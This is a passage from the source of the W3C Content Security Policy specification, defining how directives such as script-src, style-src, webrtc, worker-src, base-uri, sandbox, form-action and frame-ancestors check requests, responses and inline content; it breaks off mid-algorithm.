  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `object-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-script-src">`script-src`</h4>

  The <dfn export>script-src</dfn> directive restricts the locations from which scripts
  may be executed. This includes not only URLs loaded directly into <{script}>
  elements, but also things like inline script blocks and XSLT stylesheets
  [[XSLT]] which can trigger script execution. The syntax for the directive's
  name and value is described by the following ABNF:

  <pre>
    directive-name  = "script-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The `script-src` directive acts as a default fallback for all <a for="request/destination">script-like</a>
  destinations (including worker-specific destinations if <a>`worker-src`</a>
  is not present). Unless granularity is desired `script-src` should
  be used in favor of <a>`script-src-attr`</a> and <a>`script-src-elem`</a>
  as in most situations there is no particular reason to have separate lists of
  permissions for inline event handlers and <{script}> elements.

  The `script-src` directive governs six things:

  1.  Script <a for="/">requests</a> MUST pass through [[#should-block-request]].

  2.  Script <a>responses</a> MUST pass through [[#should-block-response]].

  3.  Inline <{script}> blocks MUST pass through [[#should-block-inline]]. Their
      behavior will be blocked unless every policy allows inline script, either
      implicitly by not specifying a `script-src` (or `default-src`) directive,
      or explicitly, by specifying "`unsafe-inline`", a
      <a grammar>nonce-source</a> or a <a grammar>hash-source</a> that matches
      the inline block.

  4.  The following JavaScript execution sinks are gated on the "`unsafe-eval`"
      source expression:

      *   {{eval()}}
      *   {{Function()}}
      *   {{setTimeout()}} with an initial argument which is not callable.
      *   {{setInterval()}} with an initial argument which is not callable.

      Note: If a user agent implements non-standard sinks like `setImmediate()`
      or `execScript()`, they SHOULD also be gated on "`unsafe-eval`".
      Note: Since "`unsafe-eval`" acts as a global page flag, <a>`script-src-attr`</a>
      and <a>`script-src-elem`</a> are not used when performing this check, instead
      `script-src` (or it's fallback directive) is always used.

  5. The following WebAssembly execution sinks are gated on the
     "`wasm-unsafe-eval`" or the "`unsafe-eval`" source expressions:

     *    {{new WebAssembly.Module()}}
     *    {{WebAssembly.compile()}}
     *    {{WebAssembly.compileStreaming()}}
     *    {{WebAssembly.instantiate()}}
     *    {{WebAssembly.instantiateStreaming()}}

     Note: the "`wasm-unsafe-eval`" source expression is the more specific
     source expression. In particular, "`unsafe-eval`" permits both compilation
     (and instantiation) of WebAssembly and, for example, the use of the "`eval`" operation in
     JavaScript. The "`wasm-unsafe-eval`" source expression only permits
     WebAssembly and does not affect JavaScript.

  6.  Navigation to `javascript:` URLs MUST pass through [[#should-block-inline]]. Such navigations
      will only execute script if every policy allows inline script, as per #3 above.

  <h5 algorithm id="script-src-pre-request">
    `script-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing [[#script-pre-request]] on |request|,
      this directive, and |policy|.

  <h5 algorithm id="script-src-post-request">
    `script-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing [[#script-post-request]] on |request|,
      |response|, this directive, and |policy|.

  <h5 algorithm id="script-src-inline">
    `script-src` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Assert: |element| is not null or |type| is "`navigation`".

  2.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  3.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src` and |policy| is "`No`", return "`Allowed`".

  4.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source|, is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h4 id="directive-script-src-elem">`script-src-elem`</h4>

  The syntax for the directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "script-src-elem"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The <dfn export>script-src-elem</dfn> directive applies to all script requests and
  script blocks. Attributes that execute script (inline event handlers) are
  controlled via <a>`script-src-attr`</a>.

  As such, the following differences exist when comparing to `script-src`:
  * `script-src-elem` applies to inline checks whose `|type|` is "`script`" and
    "`navigation`" (and is ignored for inline checks whose `|type|` is "`script attribute`").
  * `script-src-elem`'s <a for="directive">value</a> is not used for JavaScript
    execution sink checks that are gated on the "`unsafe-eval`" check.
  * `script-src-elem` is not used as a fallback for the `worker-src` directive.
    The `worker-src` checks still fall back on the `script-src` directive.

  <h5 algorithm id="script-src-elem-pre-request">
    `script-src-elem` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src-elem` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing [[#script-pre-request]] on |request|,
      this directive, and |policy|.

  <h5 algorithm id="script-src-elem-post-request">
    `script-src-elem` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src-elem` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing [[#script-post-request]] on |request|,
      |response|, this directive, and |policy|.

  <h5 algorithm id="script-src-elem-inline">
    `script-src-elem` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Assert: |element| is not null or |type| is "`navigation`".

  2.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  3.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src-elem`, and |policy| is "`No`", return "`Allowed`".

  4.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source| is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h4 id="directive-script-src-attr">`script-src-attr`</h4>

  The syntax for the directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "script-src-attr"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The <dfn export>script-src-attr</dfn> directive applies to event handlers and, if present,
  it will override the `script-src` directive for relevant checks.

  <h5 algorithm id="script-src-attr-inline">
    `script-src-attr` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Assert: |element| is not null or |type| is "`navigation`".

  2.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  3.  If the result of executing [[#should-directive-execute]] on |name|,
      `script-src-attr` and |policy| is "`No`", return "`Allowed`".

  4.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source|, is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h4 id="directive-style-src">`style-src`</h4>

  The <dfn export>style-src</dfn> directive restricts the locations from which style
  may be applied to a {{Document}}. The syntax for the directive's name and
  value is described by the following ABNF:

  <pre>
    directive-name  = "style-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The `style-src` directive governs several things:

  1.  Style <a for="/">requests</a> MUST pass through [[#should-block-request]]. This
      includes:

      1.  Stylesheet requests originating from a <{link}> element.
      2.  Stylesheet requests originating from the <a at-rule>`@import`</a>
          rule.
      3.  Stylesheet requests originating from a `Link` HTTP response header
          field [[!RFC8288]].

  2.  <a>Responses</a> to style requests MUST pass through
      [[#should-block-response]].

  3.  Inline <{style}> blocks MUST pass through [[#should-block-inline]]. The
      styles will be blocked unless every policy allows inline style, either
      implicitly by not specifying a `style-src` (or `default-src`) directive,
      or explicitly, by specifying "`unsafe-inline`", a
      <a grammar>nonce-source</a> or a <a grammar>hash-source</a> that matches
      the inline block.

  4.  The following CSS algorithms are gated on the `unsafe-eval` source
      expression:

      1.  <a>insert a CSS rule</a>
      2.  <a>parse a CSS rule</a>,
      3.  <a>parse a CSS declaration block</a>
      4.  <a>parse a group of selectors</a>

      This would include, for example, all invocations of CSSOM's various
      <code>cssText</code> setters and <code>insertRule</code> methods
      [[!CSSOM]] [[!HTML]].

      ISSUE(w3c/webappsec-csp#212): This needs to be better explained.

  <h5 algorithm id="style-src-pre-request">
    `style-src` Pre-request Check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-nonce-to-source-list]] on
      |request|'s <a for="request">cryptographic nonce metadata</a> and this
      directive's <a for="directive">value</a> is "`Matches`", return
      "`Allowed`".

  4.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h5 algorithm id="style-src-post-request">
    `style-src` Post-request Check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-nonce-to-source-list]] on
      |request|'s <a for="request">cryptographic nonce metadata</a> and this
      directive's <a for="directive">value</a> is "`Matches`", return
      "`Allowed`".

  4.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h5 algorithm id="style-src-inline">
    `style-src` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  This directive's <a for="directive">initialization</a> algorithm is as follows:

  ISSUE: Do something interesting to the execution context in order to lock down
  interesting CSSOM algorithms. I don't think CSSOM gives us any hooks here, so
  let's work with them to put something reasonable together.

  <h4 id="directive-style-src-elem">`style-src-elem`</h4>

  The syntax for the directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "style-src-elem"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The <dfn export>style-src-elem</dfn> directive governs the behaviour of styles
  except for styles defined in inline attributes.

  <h5 algorithm id="style-src-elem-pre-request">
    `style-src-elem` Pre-request Check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src-elem` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-nonce-to-source-list]] on
      |request|'s <a for="request">cryptographic nonce metadata</a> and this
      directive's <a for="directive">value</a> is "`Matches`", return
      "`Allowed`".

  4.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h5 algorithm id="style-src-elem-post-request">
    `style-src-elem` Post-request Check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src-elem` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-nonce-to-source-list]] on
      |request|'s <a for="request">cryptographic nonce metadata</a> and this
      directive's <a for="directive">value</a> is "`Matches`", return
      "`Allowed`".

  4.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  5.  Return "`Allowed`".

  <h5 algorithm id="style-src-elem-inline">
    `style-src-elem` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src-elem` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-style-src-attr">`style-src-attr`</h4>

  The syntax for the directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "style-src-attr"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The <dfn export>style-src-attr</dfn> directive governs the behaviour of style attributes.

  <h5 algorithm id="style-src-attr-inline">
    `style-src-attr` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `style-src-attr` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-element-to-source-list]] on
      |element|, this directive's <a for="directive">value</a>, |type|,
      and |source|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h3 id="directives-other">Other Directives</h3>

  <h4 id="directive-webrtc">`webrtc`</h4>

  The <dfn export>webrtc</dfn> directive restricts whether connections may be
  established via WebRTC. The syntax for the directive's name and value is
  described by the following ABNF:

  <pre dfn-type="grammar" link-type="grammar">
    directive-name  = "webrtc"
    directive-value = "<dfn>'allow'</dfn>" / "<dfn>'block'</dfn>"
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      Content-Security-Policy: <a>webrtc</a> 'block'
    </pre>

    No local ICE candidates will be surfaced, as no STUN checks will be made
    against the ICE server provided to the peer connection negotiated below; No
    connectivity-checks will be attempted to any remote candidates provided by JS;
    The connectionState will never transition to "connected" and instead transition
    directly from its initial state of "new" to "failed" shortly. Attempts to
    pc.restartIce() will repeat this outcome.

    <pre highlight="html">
      &lt;script&gt;
        const iceServers = [{urls: "stun:stun.l.google.com:19302"}];
        const pc = new RTCPeerConnection({iceServers});
        pc.createDataChannel("");
        const io = new WebSocket('ws://example.com:8080');
        pc.onicecandidate = ({candidate}) => io.send({candidate});
        pc.onnegotiationneeded = async () => {
          await pc.setLocalDescription();
          io.send({description: pc.localDescription});
        };
        io.onmessage = async ({data: {description, candidate}}) => {
          if (description) {
            await pc.setRemoteDescription(description);
            if (description.type == "offer") {
              await pc.setLocalDescription();
              io.send({description: pc.localDescription});
            }
          } else if (candidate) await pc.addIceCandidate(candidate);
        };
     &lt;/script&gt;
    </pre>
  </div>

  <h5 algorithm id="webrtc-pre-connect">
    `webrtc` Pre-connect Check
  </h5>

  This directive's <a for="directive">webrtc pre-connect check</a> is as follows:

  1.  If this directive's [=directive/value=] contains a single item which is an
      <a>ASCII case-insensitive</a> match for the string "<a grammar>`'allow'`</a>",
      return "`Allowed`".

  2.  Return "`Blocked`".

  <h4 id="directive-worker-src">`worker-src`</h4>

  The <dfn export>worker-src</dfn> directive restricts the URLs which may be loaded as
  a {{Worker}}, {{SharedWorker}}, or {{ServiceWorker}}. The syntax for the
  directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "worker-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>worker-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `worker-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;script&gt;
        var blockedWorker = new Worker("data:application/javascript,...");
        blockedWorker = new SharedWorker("https://example.org/");
        navigator.serviceWorker.register('https://example.org/sw.js');
      &lt;/script&gt;
    </pre>
  </div>

  <h5 algorithm id="worker-src-pre-request">
    `worker-src` Pre-request Check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `worker-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="worker-src-post-request">
    `worker-src` Post-request Check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `worker-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h3 id="directives-document">
    Document Directives
  </h3>

  The following directives govern the properties of a document or worker
  environment to which a policy applies.

  <h4 id="directive-base-uri">`base-uri`</h4>

  The <dfn export>base-uri</dfn> directive restricts the {{URL}}s which can be used in
  a {{Document}}'s <{base}> element. The syntax for the directive's name and
  value is described by the following ABNF:

  <pre>
    directive-name  = "base-uri"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  The following algorithm is called during HTML's <a>set the frozen base url</a>
  algorithm in order to monitor and enforce this directive:

  <h5 id="allow-base-for-document" algorithm dfn export>
    Is |base| allowed for |document|?
  </h5>

  Given a {{URL}} |base|, and a {{Document}} |document|, this algorithm
  returns "`Allowed`" if |base| may be used as the value of a <{base}>
  element's <{base/href}> attribute, and "`Blocked`" otherwise:

  1.  <a for=list>For each</a> |policy| of |document|'s <a for="/">global object</a>'s
      <a for="global object">csp list</a>:

      1.  Let |source list| be null.

      2.  If a <a>directive</a> whose <a for="directive">name</a> is
          "`base-uri`" is present in |policy|'s <a for="policy">directive
          set</a>, set |source list| to that <a>directive</a>'s
          <a for="directive">value</a>.

      3.  If |source list| is null, skip to the next |policy|.

      4.  If the result of executing [[#match-url-to-source-list]] on |base|, |source list|,
          |policy|'s [=policy/self-origin=], and `0` is "`Does Not Match`":

          1.  Let |violation| be the result of executing
              [[#create-violation-for-global]] on |document|'s <a for="/">global
              object</a>, |policy|, and "<a>`base-uri`</a>".

          2.  Set |violation|'s <a for="violation">resource</a> to "`inline`".

          3.  Execute [[#report-violation]] on |violation|.

          4.  If |policy|'s <a for="policy">disposition</a> is "`enforce`",
              return "`Blocked`".

      Note: We compare against the fallback base URL in order to deal correctly with things like
      <a>an iframe `srcdoc` `Document`</a> which has been sandboxed into an opaque origin.

  2.  Return "`Allowed`".

  <h4 id="directive-sandbox">`sandbox`</h4>

  The <dfn export>sandbox</dfn> directive specifies an HTML sandbox policy which the
  user agent will apply to a resource, just as though it had been included in
  an <{iframe}> with a <{iframe/sandbox}> property.

  The directive's syntax is described by the following ABNF grammar, with
  the additional requirement that each token value MUST be one of the
  keywords defined by HTML specification as allowed values for the <{iframe}>
  <{iframe/sandbox}> attribute [[!HTML]].

  <pre dfn-type="grammar" link-type="grammar">
    directive-name  = "sandbox"
    directive-value = "" / <a>token</a> *( <a>required-ascii-whitespace</a> <a>token</a> )
  </pre>

  This directive has no reporting requirements; it will be ignored entirely when
  delivered in a <a http-header>`Content-Security-Policy-Report-Only`</a> header, or within
  a <{meta}> element.

  <h5 algorithm id="sandbox-init">
    `sandbox` Initialization
  </h5>

  This directive's <a for="directive">initialization</a> algorithm is
  responsible for checking whether a worker is allowed to run according
  to the <a>`sandbox`</a> values present in its policies as follows:

  Note: The <a>sandbox</a> directive is also responsible for adjusting a
  {{Document}}'s <a for=Document>active sandboxing flag set</a> via the
  <a spec=html>CSP-derived sandboxing flags</a>.

  Given a {{Document}} or <a for="/">global object</a> |context| and a <a for="/">policy</a>
  |policy|:

  1.  If |policy|'s <a for="policy">disposition</a> is not "`enforce`", or
      |context| is not a {{WorkerGlobalScope}}, then abort this algorithm.

  2.  Let |sandboxing flag set| be a new [=/sandboxing flag set=].

  3.  <a>Parse a sandboxing directive</a> using this directive's <a
      for="directive">value</a> as the input, and |sandboxing flag set| as the output.

  4.  If |sandboxing flag set| contains either the <a>sandboxed scripts browsing context
      flag</a> or the <a>sandboxed origin browsing context flag</a> flags,
      return "`Blocked`".

       Note: This will need to change if we allow Workers to be sandboxed into unique
       origins, which seems like a pretty reasonable thing to do.

  5.  Return "`Allowed`".

  <h3 id="directives-navigation">
    Navigation Directives
  </h3>

  <h4 id="directive-form-action">`form-action`</h4>

  The <dfn export>form-action</dfn> directive restricts the {{URL}}s which can be used
  as the target of a form submissions from a given context. The directive's syntax is
  described by the following ABNF grammar:

  <pre dfn-type="grammar" link-type="grammar" class="abnf">
    directive-name  = "form-action"
    directive-value = <a>serialized-source-list</a>
  </pre>

  <h5 algorithm id="form-action-pre-navigate">
    `form-action` Pre-Navigation Check
  </h5>

  Given a <a for="/">request</a> |request|, a string |navigation type| ("`form-submission`" or
  "`other`"), and a <a for="/">policy</a> |policy| this algorithm returns "`Blocked`" if a form
  submission violates the `form-action` directive's constraints, and "`Allowed`"
  otherwise. This constitutes the `form-action` directive's <a>pre-navigation check</a>:

  <ol class="algorithm">
    1.  Assert: |policy| is unused in this algorithm.

    2.  If |navigation type| is "`form-submission`":

        1.  If the result of executing [[#match-request-to-source-list]] on
            |request|, this directive's <a for="directive">value</a>, and a
            |policy|, is "`Does Not Match`", return "`Blocked`".

    3.  Return "`Allowed`".
  </ol>

  <h4 id="directive-frame-ancestors">`frame-ancestors`</h4>

  The <dfn export>frame-ancestors</dfn> directive restricts the {{URL}}s which can
  embed the resource using <{frame}>, <{iframe}>, <{object}>, or <{embed}>. Resources
  can use this directive to avoid many UI Redressing [[UISECURITY]] attacks, by
  avoiding the risk of being embedded into potentially hostile contexts.

  The directive's syntax is described by the following ABNF grammar:

  <pre dfn-type="grammar" link-type="grammar">
    directive-name  = "frame-ancestors"
    directive-value = <a>ancestor-source-list</a>

    <dfn>ancestor-source-list</dfn> = ( <a>ancestor-source</a> *( <a>required-ascii-whitespace</a> <a>ancestor-source</a>) ) / "<a>'none'</a>"
    <dfn>ancestor-source</dfn>      = <a>scheme-source</a> / <a>host-source</a> / "<a>'self'</a>"
  </pre>

  The `frame-ancestors` directive MUST be ignored when contained in a policy
  declared via a <{meta}> element.

  Note: The `frame-ancestors` directive's syntax is similar to a <a>source
  list</a>, but `frame-ancestors` will not fall back to the `default-src`
  directive's value if one is specified. That is, a policy that declares
  `default-src 'none'` will still allow the resource to be embedded by anyone.

  <h5 algorithm id="frame-ancestors-navigation-response">
    `frame-ancestors` Navigation Response Check
  </h5>

  Given a <a for="/">request</a> |request|, a string |navigation type|
  ("`form-submission`" or "`other`"), a
  <a>response</a> |navigation response|, a <a>navigable</a> |target|,
  a string |check type| ("`source`" or "`response`"), and a
  <a for="/">policy</a> |policy| this algorithm returns "`Blocked`" if one or
  more of the ancestors of |target| violate the `frame-ancestors` directive
  delivered with the response, and "`Allowed`" otherwise. This constitutes the
  `frame-ancestors` directive's <a>navigation response check</a>:

  <ol class="algorithm">
    1.  If |navigation response|'s [=response/URL=] [=is local=], return "`Allowed`".

    2.  Assert: |request|, |navigation response|, and |navigation type|, are unused
        from this point forward in this algorithm, as `frame-ancestors` is concerned only
        with |navigation response|'s <a>frame-ancestors</a> <a>directive</a>.

    3.  If |check type| is "`source`", return "`Allowed`".

        Note: The 'frame-ancestors' <a>directive</a> is relevant only to the
        |target| <a>navigable</a> and it has no impact on the |request|'s
        context.

    4.  If |target| is not a <a>child navigable</a>, return "`Allowed`".

    5.  Let |current| be |target|.

    6.  While |current| is a <a>child navigable</a>:

        1.  Let |document| be |current|'s [=navigable/container document=].

        2.  Let |origin| be the result of executing the <a>URL parser</a> on the
            <a lt="ASCII serialization of an origin">ASCII serialization</a>
            of |document|'s [=Document/origin=].

        3.  If [[#match-url-to-source-list]] returns `Does Not Match` when
            executed upon |origin|, this directive's <a for="directive">value</a>,
            |policy|'s [=policy/self-origin=], and `0`, return "`Blocked`".

        4.  Set |current| to |document|'s <a>node navigable</a>.

    7.  Return "`Allowed`".
  </ol>

  <h5 id="frame-ancestors-and-frame-options">
    Relation to \`<code>[:X-Frame-Options:]</code>\`
  </h5>

  This directive is similar to the \`<code>[:X-Frame-Options:]</code>\` HTTP
  response header. The `'none'` source expression is roughly equivalent to that
  header's \``DENY`\`, and `'self'` to that header's \``SAMEORIGIN`\`. [[!HTML]]

  In order to allow backwards-compatible deployment, the
  <a>`frame-ancestors`</a> directive <em>obsoletes</em> the
  \`<code>[:X-Frame-Options:]</code>\` header. If a resource is delivered with
  a <a for="/">policy</a> that includes a <a>directive</a> named
  <a>`frame-ancestors`</a> and whose <a for="policy">disposition</a> is
  "`enforce`", then the \`<code>[:X-Frame-Options:]</code>\` header will be
  ignored, per <cite>HTML</cite>'s processing model.

  <h3 id="directives-reporting">
    Reporting Directives
  </h3>

  Various algorithms in this document hook into the reporting process by
  constructing a <a>violation</a> object via [[#create-violation-for-request]]
  or [[#create-violation-for-global]], and passing that object to
  [[#report-violation]] to deliver the report.

  <h4 id="directive-report-uri">`report-uri`</h4>

  <div class="note">
    Note: The <a>`report-uri`</a> directive is deprecated. Please use the
    <a>`report-to`</a> directive instead. If the latter directive is present,
    this directive will be ignored. To ensure backwards compatibility, we
    suggest specifying both, like this:

    <div class="example">
      <pre>
        <a http-header>Content-Security-Policy</a>: ...; <a>report-uri</a> https://endpoint.com; <a>report-to</a> groupname
      </pre>
    </div>
  </div>

  The <dfn export>`report-uri`</dfn> directive defines a set of endpoints to which
  <a>csp violation reports</a> will be sent when particular behaviors are prevented.

  <pre link-type="grammar">
    directive-name  = "report-uri"
    directive-value = <a>uri-reference</a> *( <a>required-ascii-whitespace</a> <a>uri-reference</a> )

    ; The <a>uri-reference</a> grammar is defined in Section 4.1 of RFC 3986.
  </pre>

  The directive has no effect in and of itself, but only gains meaning in
  combination with other directives.

  <h4 id="directive-report-to">`report-to`</h4>

  The <dfn export>`report-to`</dfn> directive defines a <a lt="endpoint">reporting
  endpoint</a> to which violation reports ought to be sent [[REPORTING]]. The
  directive's behavior is defined in [[#report-violation]]. The directive's name
  and value are described by the following ABNF:

  <pre>
    directive-name  = "report-to"
    directive-value = <a grammar>token</a>
  </pre>

  <h3 id="directives-elsewhere">
    Directives Defined in Other Documents
  </h3>

  This document defines a core set of directives, and sets up a framework for
  modular extension by other specifications. At the time this document was
  produced, the following stable documents extend CSP:

  * [[MIX]] defines `block-all-mixed-content`
  * [[UPGRADE-INSECURE-REQUESTS]] defines `upgrade-insecure-requests`

  Extensions to CSP MUST register themselves via the process outlined in
  [[!RFC7762]]. In particular, note the criteria discussed in Section 4.2 of
  that document.

  New directives SHOULD use the <a for="directive">pre-request check</a>,
  <a for="directive">post-request check</a>, and
  <a for="directive">initialization</a> hooks in order to integrate themselves
  into Fetch and HTML.

  <h3 id="matching-algorithms">Matching Algorithms</h3>

  <h4 id="script-checks">Script directive checks</h4>

  <h5 algorithm id="script-pre-request">
    Script directives pre-request check
  </h5>

  Given a <a for="/">request</a> |request|, a <a>directive</a> |directive|,
  and a <a for="/">policy</a> |policy|:

  1.  If |request|'s <a for="request">destination</a> is <a for="request/destination">script-like</a>:

      1.  If the result of executing [[#match-nonce-to-source-list]] on
          |request|'s <a for="request">cryptographic nonce metadata</a> and this
          directive's <a for="directive">value</a> is "`Matches`", return
          "`Allowed`".

      2.  If the result of executing
          [[#match-integrity-metadata-to-source-list]] on |request|'s <a
          for="request">integrity metadata</a> and this directive's <a
          for="directive">value</a> is "`Matches`", return "`Allowed`".

      3.  If |directive|'s <a for="directive">value</a> contains a <a>source
          expression</a> that is an <a>ASCII case-insensitive</a> match for
          the "<a grammar>`'strict-dynamic'`</a>" <a grammar>keyword-source</a>:

          1.  If the |request|'s <a for="request">parser metadata</a> is
